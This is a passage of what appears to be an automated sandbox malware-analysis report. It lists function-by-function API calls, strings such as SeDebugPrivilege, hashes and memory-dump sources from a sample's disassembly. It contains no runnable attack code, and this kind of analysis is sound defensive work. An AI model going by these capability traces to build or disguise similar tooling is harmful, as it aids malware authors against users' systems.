CloseHandle.KERNEL32(00000000), ref: 0084EDB7

Strings

SeDebugPrivilege, xrefs: 0084ECD6

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 8c6dc62fd22794d3d3eac742f1e9932f821e78b07e45bb596b4649fb24872bb2
Instruction ID: b13c14c0b29bd20041c531cff80a199481556c32409dbbfaf23059bdd886bde8
Opcode Fuzzy Hash: 8c6dc62fd22794d3d3eac742f1e9932f821e78b07e45bb596b4649fb24872bb2
Instruction Fuzzy Hash: 9F41BB316002149FDB14EF28CC99FAEB7A0FF84714F088059F9429B3D2DB78A804CB96

Function 00833226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 008332C5

Strings

question, xrefs: 0083327E
info, xrefs: 00833266
blank, xrefs: 00833247
stop, xrefs: 00833296
warning, xrefs: 008332AE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f2100ceb34655cec2b7684d00a0531135cb75513cb26d7366e790d3beca2c18f
Instruction ID: 0a0101b03a701b0afb99bf2348be7936e067d4147dfd60858acc7614b8ad0f55
Opcode Fuzzy Hash: f2100ceb34655cec2b7684d00a0531135cb75513cb26d7366e790d3beca2c18f
Instruction Fuzzy Hash: 0B11273120834EBAE7056A54DC42C6BB39CFF59376F20002AF605E62C2E7AD5B4046F5

Function 00848BC0 Relevance: 12.3, APIs: 8, Instructions: 324COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00848BEC
CoInitialize.OLE32(00000000), ref: 00848C19
GetRunningObjectTable.OLE32(00000000,?), ref: 00848D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00848E50
CoGetObject.OLE32(?,00000000,00862C0C,?), ref: 00848EA7
SetErrorMode.KERNEL32(00000000), ref: 00848EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00848F3A
VariantClear.OLEAUT32(?), ref: 00848F4A

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
String ID:
API String ID: 2437601815-0
Opcode ID: ecf8e234ab362aa333675554cc57bdb3cb338d582640efdad26313569aeb606a
Instruction ID: bbe529599a56a6cc5a0b0cfd039e3cbaaf4442f1cd40fd89623a9da37936bbc9
Opcode Fuzzy Hash: ecf8e234ab362aa333675554cc57bdb3cb338d582640efdad26313569aeb606a
Instruction Fuzzy Hash: 3DC1DFB1608309EFD700EF68C88492AB7E9FF89748F00496DF58ADB251DB71ED058B52

Function 00834534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0083454E
LoadStringW.USER32(00000000), ref: 00834555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0083456B
LoadStringW.USER32(00000000), ref: 00834572
_wprintf.LIBCMT ref: 00834598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 008345B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00834593

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 47421bf127f25a1a43813f12a06f9fd17911b48128eb913f3fea18ad4252e721
Instruction ID: f8964aa4fb55cfc96ce74206bc021633da886229f5d31085a9882cd0dbe651d4
Opcode Fuzzy Hash: 47421bf127f25a1a43813f12a06f9fd17911b48128eb913f3fea18ad4252e721
Instruction Fuzzy Hash: 940167F2900308BFE711A794DD89EF7776CFB08301F0005A5BB45D2152EA785E858B70

Function 007D2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000), ref: 007D2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000,000000FF), ref: 007D2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000), ref: 0080C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C417,00000004,00000000,00000000,00000000), ref: 0080C4D6

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: f270ac3b75a77d5b30eddb39ca2409d53784a3c4850927ae79ba7330d5b08b82
Instruction ID: c393e588d357b2f86f63c7154ed8744ef4b2a281e9a611d6265d31bb6a9d0486
Opcode Fuzzy Hash: f270ac3b75a77d5b30eddb39ca2409d53784a3c4850927ae79ba7330d5b08b82
Instruction Fuzzy Hash: CE41E730304780AAC7759B288C9CA7A7BB2FBE5300F58C51BE947867A3D67D9843D710

Function 00837368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0083737F

Part of subcall function 007F0FF6: std::exception::exception.LIBCMT ref: 007F102C
Part of subcall function 007F0FF6: __CxxThrowException@8.LIBCMT ref: 007F1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008373B6
RtlEnterCriticalSection.NTDLL(?), ref: 008373D2
_memmove.LIBCMT ref: 00837420
_memmove.LIBCMT ref: 0083743D
RtlLeaveCriticalSection.NTDLL(?), ref: 0083744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00837461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00837480

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 433e44f4abdcbf69864e116d8d3a1e753c167a09ec2ba32b4e94f99e4af87473
Instruction ID: 4c7485847df3c2457285143219ec976c4bf3e8c2e1c6ed3f4829743674c23b63
Opcode Fuzzy Hash: 433e44f4abdcbf69864e116d8d3a1e753c167a09ec2ba32b4e94f99e4af87473
Instruction Fuzzy Hash: 72315D71904209EBDF10DF64DC89AAB7BB8FF84711F5441A5FA04EB246DB34DA14CBA4

Function 00856442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0085645A
GetDC.USER32(00000000), ref: 00856462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0085646D
ReleaseDC.USER32(00000000,00000000), ref: 00856479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008564B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008564C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00859299,?,?,000000FF,00000000,?,000000FF,?), ref: 00856500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00856520

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cfa5cf7b21c7fddc2846682046178a3c2f5b94424578019780919794c13aa24b
Instruction ID: fee4200e38c927953faa4857c90f9f0559b91572bd93daac520f9611d3d4d030
Opcode Fuzzy Hash: cfa5cf7b21c7fddc2846682046178a3c2f5b94424578019780919794c13aa24b
Instruction Fuzzy Hash: 80317C72240610AFEF118F10CC4AFAB3FA9FF19762F040065FE08DA192E6799851CB64

Function 0082C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0082C087
_memcmp.LIBCMT ref: 0082C0A9
_memcmp.LIBCMT ref: 0082C0C1
_memcmp.LIBCMT ref: 0082C0D4
_memcmp.LIBCMT ref: 0082C0EE
_memcmp.LIBCMT ref: 0082C101
_memcmp.LIBCMT ref: 0082C119
_memcmp.LIBCMT ref: 0082C134

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 68f5e684f817dba528ce8751d2133f5e3f71b2a6992dfe0cba5d013c72400a8e
Instruction ID: 8ea74e33025dded7fc9950e45c72fd8a37db9b0a491726065a26126e0ba9b9df
Opcode Fuzzy Hash: 68f5e684f817dba528ce8751d2133f5e3f71b2a6992dfe0cba5d013c72400a8e
Instruction Fuzzy Hash: 5221B061641A29FBD214AA21AC46FBF379CFF207A9F440020FE05D63C2EB59DE61C5A5

Function 0083D7F8 Relevance: 10.8, APIs: 7, Instructions: 283COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

CoInitialize.OLE32(00000000), ref: 0083D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0083D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0083D8FC
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0083D9B7
_memset.LIBCMT ref: 0083DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0083DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0083DAAB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
String ID:
API String ID: 3008154123-0
Opcode ID: 44d4b0cfa577fce4532ad77fd16536ecefc64e80eb6389fef06830019f02a50b
Instruction ID: fb09ad8459acdb0936fdf94224bfd7454bc619a3960c8b647571d40c314c78ad
Opcode Fuzzy Hash: 44d4b0cfa577fce4532ad77fd16536ecefc64e80eb6389fef06830019f02a50b
Instruction Fuzzy Hash: C6B1D975A00219EFDB04DF64D888DAEBBB9FF88314F148469F909EB251DB34AD45CB50

Function 007D1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd91faa1e663863e697fafff69c36fa2e62749d451eda54bf5b0a06762dd1c0
Instruction ID: ce65a2fc616a4c2865fa4069ad8590467966d143db5e5a7792219a2c6b83b91a
Opcode Fuzzy Hash: 4cd91faa1e663863e697fafff69c36fa2e62749d451eda54bf5b0a06762dd1c0
Instruction Fuzzy Hash: 93715830900509FFCB04DF98CD89ABEBB79FF85314F54815AF915AB291D738AA51CBA0

Function 0085B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(016335D8), ref: 0085B6A5
IsWindowEnabled.USER32(016335D8), ref: 0085B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0085B795
SendMessageW.USER32(016335D8,000000B0,?,?), ref: 0085B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0085B809
GetWindowLongW.USER32(016335D8,000000EC), ref: 0085B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0085B843

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 1bdfec7c921634699f356ee4b6a774764d4c37422c4e347d68fbcb5d5f0e2bf2
Instruction ID: 92a3f4e9398b398529890c634f501ffb354dc790cc258fb0e0d6f8f0366f1d6d
Opcode Fuzzy Hash: 1bdfec7c921634699f356ee4b6a774764d4c37422c4e347d68fbcb5d5f0e2bf2
Instruction Fuzzy Hash: B1719C34600204AFDB209FA4C894FBABBF9FFA9342F184069ED45D73A1D731A959CB50

Function 008486D0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

CoInitialize.OLE32 ref: 00848718
VariantInit.OLEAUT32(?), ref: 00848890
VariantClear.OLEAUT32(?), ref: 008488F1

Strings

Invalid parameter, xrefs: 0084880F
Failed to create object, xrefs: 0084878E, 00848844
NULL Pointer assignment, xrefs: 008487C8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Variant$ClearInitInitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 4106155388-1287834457
Opcode ID: 7822a9b307a968d141cf06ed4c0d830b4bff8273355c372797ddb3f71277feaf
Instruction ID: 73c7217b9b6560cf85b7d8b4cfd3391926ce1c559b38632f281e035e534bcd9f
Opcode Fuzzy Hash: 7822a9b307a968d141cf06ed4c0d830b4bff8273355c372797ddb3f71277feaf
Instruction Fuzzy Hash: AC615970608315EFD710DF24C998A6EBBE8FF88718F104829F995DB291DB74E944CB92

Function 0084F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0084F75C
_memset.LIBCMT ref: 0084F825
ShellExecuteExW.SHELL32(?), ref: 0084F86A

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

Part of subcall function 007EFEC6: _wcscpy.LIBCMT ref: 007EFEE9

GetProcessId.KERNEL32(00000000), ref: 0084F8E1
CloseHandle.KERNEL32(00000000), ref: 0084F910

Strings

@, xrefs: 0084F839

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: f8fc515320482aa519be9f5ca4304fcadbc784bcf412ccdb7615b8182ce9aea4
Instruction ID: ed8a17f9b5963d924d23a3277519acb1e25ff286c0f910e6e68751fc1c6b4861
Opcode Fuzzy Hash: f8fc515320482aa519be9f5ca4304fcadbc784bcf412ccdb7615b8182ce9aea4
Instruction Fuzzy Hash: 9B618B75A00619DFCB14EF64C584AAEBBF5FF48310F14846EE94AAB352DB34AD40CB90

Function 0083145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0083149C
GetKeyboardState.USER32(?), ref: 008314B1
SetKeyboardState.USER32(?), ref: 00831512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00831540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0083155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 008315A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 008315C8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
Instruction ID: fa7890a809c030cd10874db6e214c6ae848fbc38cb6ddeeceeeb06c98aa7fdb2
Opcode Fuzzy Hash: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
Instruction Fuzzy Hash: 0D51F3A06047D53DFF324364CC49BBA7EA9BB86B04F0C4489E1D5868C2D7D89C94D791

Function 00831276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 008312B5
GetKeyboardState.USER32(?), ref: 008312CA
SetKeyboardState.USER32(?), ref: 0083132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00831357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00831374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008313B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008313D9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
